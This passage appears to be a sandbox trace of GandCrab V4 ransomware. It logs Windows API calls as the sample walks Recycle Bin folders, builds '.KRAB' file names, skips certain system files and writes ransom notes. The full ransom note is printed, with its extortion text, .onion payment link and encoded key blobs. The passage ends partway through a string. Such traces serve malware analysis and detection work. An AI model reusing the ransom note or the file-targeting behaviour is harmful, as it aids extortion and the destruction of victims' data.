lpString2=".") returned 0 [0041.128] FindNextFileW (in: hFindFile=0xf8a088, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.129] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0041.129] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.129] FindNextFileW (in: hFindFile=0xf8a088, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.129] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0041.129] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0041.129] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\$Recycle.Bin\\d2ca4a08d2ca4dee3d.lock") returned="C:\\$Recycle.Bin\\d2ca4a08d2ca4dee3d.lock" [0041.129] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.129] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\$Recycle.Bin\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 44 [0041.129] lstrlenW (lpString="C:\\$Recycle.Bin\\d2ca4a08d2ca4dee3d.lock") returned 39 [0041.129] lstrlenW (lpString=".lock") returned 5 [0041.129] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.129] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0041.130] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.130] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.130] FindNextFileW (in: hFindFile=0xf8a088, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.130] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0041.130] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0041.130] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\$Recycle.Bin\\KRAB-DECRYPT.txt") returned="C:\\$Recycle.Bin\\KRAB-DECRYPT.txt" [0041.130] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.130] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\$Recycle.Bin\\KRAB-DECRYPT.txt.KRAB") returned 37 [0041.131] lstrlenW (lpString="C:\\$Recycle.Bin\\KRAB-DECRYPT.txt") returned 32 [0041.131] lstrlenW (lpString=".txt") returned 4 [0041.131] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.131] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0041.131] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.131] lstrlenW (lpString="C:\\$Recycle.Bin\\KRAB-DECRYPT.txt") returned 32 [0041.131] lstrlenW (lpString="C:\\$Recycle.Bin\\KRAB-DECRYPT.txt") returned 32 [0041.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0041.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0041.131] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0041.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0041.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0041.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0041.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0041.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0041.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0041.137] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0041.137] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.138] FindNextFileW (in: hFindFile=0xf8a088, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.138] lstrcmpW (lpString1="S-1-5-18", lpString2=".") returned 1 [0041.138] lstrcmpW (lpString1="S-1-5-18", lpString2="..") returned 1 [0041.138] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="S-1-5-18" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18") returned="C:\\$Recycle.Bin\\S-1-5-18" [0041.138] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\") returned="C:\\$Recycle.Bin\\S-1-5-18\\" [0041.138] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.138] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.138] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0041.138] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0041.138] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0041.138] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.139] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.139] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\\\KRAB-DECRYPT.txt") returned 42 [0041.139] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\\\KRAB-DECRYPT.txt" (normalized: "c:\\$recycle.bin\\s-1-5-18\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0041.157] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0041.158] WriteFile (in: hFile=0x2cc, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f4a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f4a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0041.159] CloseHandle (hObject=0x2cc) returned 1 [0041.159] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.348] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.348] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2c, wSecond=0x30, wMilliseconds=0x228)) [0041.348] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.349] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0041.349] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0041.349] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a08d2ca4dee3d.lock") returned 48 [0041.349] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\$recycle.bin\\s-1-5-18\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2f4 [0041.350] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.350] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.350] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\") returned 25 [0041.350] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\*") returned="C:\\$Recycle.Bin\\S-1-5-18\\*" [0041.350] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0xf8a3c8 [0041.350] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.350] FindNextFileW (in: hFindFile=0xf8a3c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.350] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0041.350] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.350] FindNextFileW (in: hFindFile=0xf8a3c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.350] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0041.350] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0041.350] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a08d2ca4dee3d.lock") returned="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a08d2ca4dee3d.lock" [0041.350] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.351] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 53 [0041.351] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a08d2ca4dee3d.lock") returned 48 [0041.351] lstrlenW (lpString=".lock") returned 5 [0041.351] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.351] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0041.351] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.351] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.351] FindNextFileW (in: hFindFile=0xf8a3c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.351] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.351] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.351] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\", lpString2="desktop.ini" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" [0041.351] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.352] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.KRAB") returned 41 [0041.352] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0041.352] lstrlenW (lpString=".ini") returned 4 [0041.352] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.352] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".ini ") returned 5 [0041.352] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.352] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0041.352] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0041.352] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0041.352] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.353] FindNextFileW (in: hFindFile=0xf8a3c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0041.353] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0041.353] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0041.353] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\KRAB-DECRYPT.txt") returned="C:\\$Recycle.Bin\\S-1-5-18\\KRAB-DECRYPT.txt" [0041.353] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.353] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\KRAB-DECRYPT.txt.KRAB") returned 46 [0041.353] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\KRAB-DECRYPT.txt") returned 41 [0041.353] lstrlenW (lpString=".txt") returned 4 [0041.353] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0041.353] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0041.353] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.353] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\KRAB-DECRYPT.txt") returned 41 [0041.353] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\KRAB-DECRYPT.txt") returned 41 [0041.353] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0041.353] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0041.353] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0041.353] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0041.354] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0041.354] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0041.354] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0041.354] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0041.354] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0041.354] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0041.354] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.354] FindNextFileW (in: hFindFile=0xf8a3c8, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0 [0041.354] FindClose (in: hFindFile=0xf8a3c8 | out: hFindFile=0xf8a3c8) returned 1 [0041.354] CloseHandle (hObject=0x2f4) returned 1 [0041.354] FindNextFileW (in: hFindFile=0xf8a088, lpFindFileData=0x338f750 | out: lpFindFileData=0x338f750) returned 1 [0041.354] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2=".") returned 1 [0041.354] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="..") returned 1 [0041.354] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000" [0041.354] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\" [0041.354] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0041.355] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0041.355] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0041.355] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0041.355] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0041.355] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.355] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0041.355] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\KRAB-DECRYPT.txt") returned 79 [0041.355] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\KRAB-DECRYPT.txt" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0041.356] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289AR